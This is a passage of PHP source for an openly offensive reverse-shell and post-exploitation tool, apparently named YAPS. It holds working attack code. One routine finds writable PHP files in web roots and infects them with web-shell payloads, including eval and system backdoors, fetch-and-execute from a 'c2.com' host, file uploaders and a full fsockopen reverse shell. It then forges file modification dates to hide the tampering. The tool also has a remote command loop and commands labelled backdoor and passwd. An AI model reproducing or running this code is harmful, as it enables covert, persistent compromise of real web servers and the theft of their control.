$version_ = (int)str_replace(".","",$version);
|
|
|
|
if($newest_version_ !== 0 && $newest_version_ > $version_){
|
|
echo red("[i]")." Your version is not up to date.\n".green("[DOWNLOAD v".str_replace("\n","",$newest_version)."]: ").$resources["updateURL"]."\n";
|
|
return;
|
|
}
|
|
echo green("[+] ")."YAPS is already up to date (v$version)!\n";
|
|
return;
|
|
}
|
|
|
|
function getFiles($dir){ // return writable php files on webserver root
|
|
$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir)); //list recursively
|
|
$list = array();
|
|
foreach($iterator as $file)
|
|
if(!is_dir($file) && is_writable($file)) //list only writable files
|
|
if($file->getPathName() !== $_SERVER["SCRIPT_FILENAME"]) //remove myself from list
|
|
if(substr($file->getPathName(),-4) == ".php") //list only php files
|
|
array_push($list,$file->getPathName());
|
|
sort($list);
|
|
return $list;
|
|
}
|
|
|
|
function select_files(){
|
|
global $s;
|
|
|
|
$webdir = array('/var/www/','/srv/','/usr/local/apache2/','/var/apache2/','/var/www/nginx-default/');
|
|
$webfiles_arr = array();
|
|
foreach($webdir as $dir)
|
|
try{
|
|
$list = getFiles($dir);
|
|
$webfiles_arr = array_merge($webfiles_arr,$list);
|
|
}catch(Exception $e){}
|
|
|
|
if(count($webfiles_arr) > 0) fwrite($s, cyan("[*] ").white("Found ".count($webfiles_arr)." writable PHP files:\n"));
|
|
|
|
for($i=0;$i<count($webfiles_arr);$i++)
|
|
fwrite($s, red("[$i] ").$webfiles_arr[$i].PHP_EOL);
|
|
|
|
fwrite($s,cyan("\n[*] ").white("Choose the files you want to infect.\n Separate by comma (e.g:1,5,7,8) and/or by range (e.g:10-16).\n Files: "));
|
|
|
|
while($data2 = fread($s, 1024)){ //receive numbers and parse
|
|
$files = str_replace(" ", "", substr($data2, 0, -1)); //remove whitespaces and newline at end
|
|
$files = explode(",",$files); //split
|
|
if(count($files) == 1 && $files[0] == "") return; //no file selected
|
|
$toInfect = array();
|
|
foreach($files as $file){
|
|
if(preg_match("/^[0-9]+$/",$file)) // filter numbers
|
|
array_push($toInfect, $file);
|
|
|
|
if(preg_match("/^[0-9]+\-[0-9]+$/",$file)){ // filter ranges
|
|
$range = explode("-",$file); // ex:4-6 -> $range[0]=4, $range[1]=6
|
|
if((int)$range[0] < (int)$range[1]) // 4 must be < than 6
|
|
for($i=(int)$range[0];(int)$i<=$range[1];$i++) // from i=4 to i=6
|
|
array_push($toInfect, $i);
|
|
}
|
|
}
|
|
sort($toInfect,SORT_NUMERIC);
|
|
choose_payload($webfiles_arr,array_unique($toInfect)); //remove duplicates
|
|
return;
|
|
}
|
|
}
|
|
|
|
function choose_payload($allFiles,$toInfect){
|
|
global $s;
|
|
$payloads = array(
|
|
//curl -d "0=whoami" website.com/infected_file.php
|
|
//curl website.com/infected_file.php?0=whoami
|
|
"0. TinyRCE " => '<?=`$_REQUEST[0]`;?>',
|
|
|
|
//same
|
|
"1. ClassicRCE " => '<?=@system($_REQUEST[0]);?>',
|
|
|
|
//curl -d "0=phpinfo();" website.com/infected_file.php
|
|
"2. Eval " => '<?=@eval($_REQUEST[0]);?>',
|
|
|
|
//curl -d "0=cGhwaW5mbygpOw==" website.com/infected_file.php (encoded phpinfo())
|
|
"3. BasedEval " => '<?=@eval(base64_decode($_REQUEST[0]));?>',
|
|
|
|
//curl -d "0=c2.com/file_to_be_executed.txt" website.com/infected_file.php
|
|
"4. RemotePHP " => '<?=@eval(file_get_contents($_REQUEST[0]));?>',
|
|
|
|
//curl -d "0=c2.com/file_to_upload&1=extension" website.com/infected_file.php
|
|
"5. RemoteUpload " => '<?=$x=rand(100,999);@file_put_contents("./".$x.".".$_REQUEST[1],@file_get_contents($_REQUEST[0]));echo $x.$_REQUEST[1];?>',
|
|
|
|
//curl -F "0=@file_to_upload.php" website.com/infected_file.php
|
|
"6. LocalUpload " => '<?php if(isset($_FILES["0"]))if(move_uploaded_file($_FILES["0"]["tmp_name"],"_".$_FILES["0"]["name"]))echo"Uploaded: _".$_FILES["0"]["name"];?>',
|
|
|
|
//curl "0=your_ip&1=port" website.com/infected_file.php
|
|
"7. StableShell " => '<?php $a="script -qc /bin/bash /dev/null";umask(0);$b=fsockopen($_REQUEST[0],$_REQUEST[1],$c,$d,30);$e=array(0=>array("pipe","r"),1=>array("pipe","w"),2=>array("pipe","w"));$f=proc_open($a,$e,$g);foreach($g as $p)stream_set_blocking($p,0);stream_set_blocking($b,0);while(!feof($b)){$i=array($b,$g[1],$g[2]);if(in_array($b,$i))fwrite($g[0],fread($b,2048));if(in_array($g[1],$i))fwrite($b,fread($g[1],2048));if(in_array($g[2],$i))fwrite($b,fread($g[2],2048));}fclose($b);foreach($g as $p)fclose($p);proc_close($f);?>'
|
|
);
|
|
|
|
fwrite($s, cyan("\n[i] ").white("List of payloads available:\n"));
|
|
$i=true;
|
|
foreach($payloads as $name => $code){
|
|
$desc = $i ? cyan($name).$code : cyan($name).white($code);
|
|
fwrite($s, $desc."\n");
|
|
$i = !$i; //toggle payload color
|
|
}
|
|
|
|
fwrite($s, cyan("\n[?] ").white("Choose a payload to infect the selected files (default:0): "));
|
|
while($choosed_payload = fread($s, 128)){
|
|
$user_payload = 0;
|
|
if((int)$choosed_payload <= count($payloads)+1)
|
|
$user_payload = $choosed_payload;
|
|
break;
|
|
}
|
|
fwrite($s, cyan("[?] ").white("Do you want do insert the payload at the beginning [0] or end [1] of the file (default: 1)? "));
|
|
while($position = fread($s, 128)){
|
|
$position = 1;
|
|
if((int)$position === 0) $position = 0;
|
|
break;
|
|
}
|
|
infect($allFiles,$toInfect,(int)$user_payload,$payloads,(int)$position);
|
|
return;
|
|
}
|
|
|
|
//list of all writable php files, files to be infected, index of choosen payload, list of payload, position (beginning or end of file)
|
|
function infect($allFiles,$fileArr,$payload_index,$payload_list,$position=1){
|
|
// 1 = end; 0 = beginning
|
|
global $s;
|
|
$payload = $payload_list[array_keys($payload_list)[$payload_index]]; //the payload itself
|
|
fwrite($s, yellow("\n[!] ").white("Files to infect:\n"));
|
|
foreach($fileArr as $fileToInfect)
|
|
fwrite($s,$allFiles[$fileToInfect]."\n");
|
|
|
|
fwrite($s, yellow("[!] ").white("Payload: ").$payload_list[array_keys($payload_list)[$payload_index]]."\n");
|
|
$position_str = $position ? "End of file" : "Beginnig of file";
|
|
fwrite($s, yellow("[!] ").white("Position: ").$position_str."\n");
|
|
fwrite($s, cyan("[?] ").white("Are you sure you want to infect those files? [Y/n]"));
|
|
while($sure = fread($s, 128)){
|
|
if(strtolower(substr($sure,0,1)) == "n") return; //not sure, return
|
|
break;
|
|
}
|
|
|
|
foreach($fileArr as $fileToInfect){
|
|
$filePath = $allFiles[$fileToInfect]; //fileToInfect is an integer that is the index of the array $allFiles
|
|
if(isAvailable("file_get_contents") && isAvailable("file_put_contents")){
|
|
$old = file_get_contents($filePath);
|
|
$originalDate = str_replace("\n","",run_cmd("stat ".$filePath.' | grep Modify | sed "s/Modify: //"')); //modify date
|
|
if($position) //end of file
|
|
$written = file_put_contents($filePath, "\n".$payload, FILE_APPEND) ? 1 : 0;
|
|
else //beginning of file
|
|
$written = file_put_contents($filePath, $payload."\n".$old) ? 1 : 0;
|
|
$result = $written ? green("[+] ").white($filePath." was infected with payload !") : red("[-] ").white($filePath." Error!");
|
|
fwrite($s,$result."\n");
|
|
if(run_cmd("touch -d ".'"'.$originalDate.'" '.$filePath))
|
|
fwrite($s,green("[+] ").white("Mantained original 'modified date' (".$originalDate.").\n"));
|
|
}
|
|
}
|
|
return;
|
|
}
|
|
|
|
function parse_stdin($input){
|
|
global $s, $color;
|
|
switch(substr($input,0,-1)){ // remove newline at end
|
|
case "!all-colors":
|
|
$color = !$color;
|
|
break;
|
|
case "!info":
|
|
return sysinfo();
|
|
break;
|
|
case "!enum":
|
|
return enum();
|
|
break;
|
|
case "!suggester":
|
|
return suggester();
|
|
break;
|
|
case "!color":
|
|
refresh_ps1(true);
|
|
break;
|
|
case "!help":
|
|
return help();
|
|
break;
|
|
case "!php":
|
|
$phpCode = getPHP();
|
|
if($phpCode !== 0){
|
|
$result = runPHP($phpCode);
|
|
fwrite($s, $result);
|
|
}else{
|
|
fwrite($s, yellow("[i] Code canceled.").PHP_EOL);
|
|
}
|
|
break;
|
|
case "!stabilize":
|
|
stabilize();
|
|
break;
|
|
case "!backdoor":
|
|
backdoor();
|
|
break;
|
|
case "!passwd":
|
|
passwd();
|
|
break;
|
|
case "!duplicate":
|
|
duplicate();
|
|
break;
|
|
case "!infect":
|
|
select_files();
|
|
break;
|
|
}
|
|
}
|
|
|
|
function cmd_not_found($cmd){
|
|
global $s, $commands;
|
|
foreach($commands as $valid_cmd){
|
|
similar_text($cmd, $valid_cmd, $percentage);
|
|
if($percentage > 70){ // if they're similar, suggest correction
|
|
fwrite($s, yellow("[!] ")."Command '!$cmd' not found. Did you mean '!".$valid_cmd."'?.\n");
|
|
return;
|
|
}
|
|
}
|
|
fwrite($s, yellow("[!] ")."Command '!".substr($c,1,-1)."' not found. Use !help.\n");
|
|
return;
|
|
}
|
|
|
|
|
|
function connect(){
|
|
global $use_password,$commands,$ps1,$s,$silent;
|
|
refresh_ps1(1);
|
|
if(!isAvailable('fsockopen')) die(red("[-]")." Function 'fsockopen' isn't available.");
|
|
if($use_password)
|
|
if(!check_password()) die(fwrite($s,red("[-]")." Wrong password.\n")); // guess what
|
|
if(!isset($_REQUEST['silent']) && !isset($_REQUEST["s"]) && !$silent) //if not in silent mode
|
|
fwrite($s, banner()."\n"); //send banner through socket
|
|
refresh_ps1();
|
|
fwrite($s, "\n".$ps1);
|
|
while($c = fread($s, 2048)){
|
|
$out = '';
|
|
if(substr($c,0,1) == "!"){//if starts with "!"
|
|
if(in_array(strtolower(substr($c,1,-1)), $commands)) // if the command is valid
|
|
$out = parse_stdin($c);
|
|
else
|
|
cmd_not_found(substr($c,1,-1)); // try to suggest correction
|
|
}elseif(substr($c, 0, 3) == 'cd '){
|
|
chdir(substr($c, 3, -1)); // since this isn't interactive, use chdir
|
|
}elseif(substr($c,0,-1) == "exit"){
|
|
fwrite($s, yellow("[i] ")."Closing connection.\n");
|
|
fclose($s);
|
|
die();
|
|
}else{
|
|
$out = run_cmd(substr($c, 0, -1));
|
|
}
|
|
if($out === false){
|
|
fwrite($s, red('[-] There are no exec functions'));
|
|
break;
|
|
}
|
|
refresh_ps1();
|
|
fwrite($s, $out.$ps1);
|
|
}
|
|
fclose($s);
|
|
}
|
|
|
|
########################## END FUNCTIONS ##########################
|
|
|
|
if($auto_verify_update) verify_update();
|
|
|
|
if(isset($_REQUEST['stabilize']) && $_REQUEST['stabilize']){ //stabilized shell was requested
|
|
$x = $_POST['x'];
|
|
stabilize($x);
|
|
}else{ // use normal (not interactive) connection
|
|
$s = @fsockopen("tcp://$ip", $port);
|
|
if(!$s) die(red("[-] ")."Couldn't connect to socket $ip:$port.");
|
|
connect();
|
|
}
|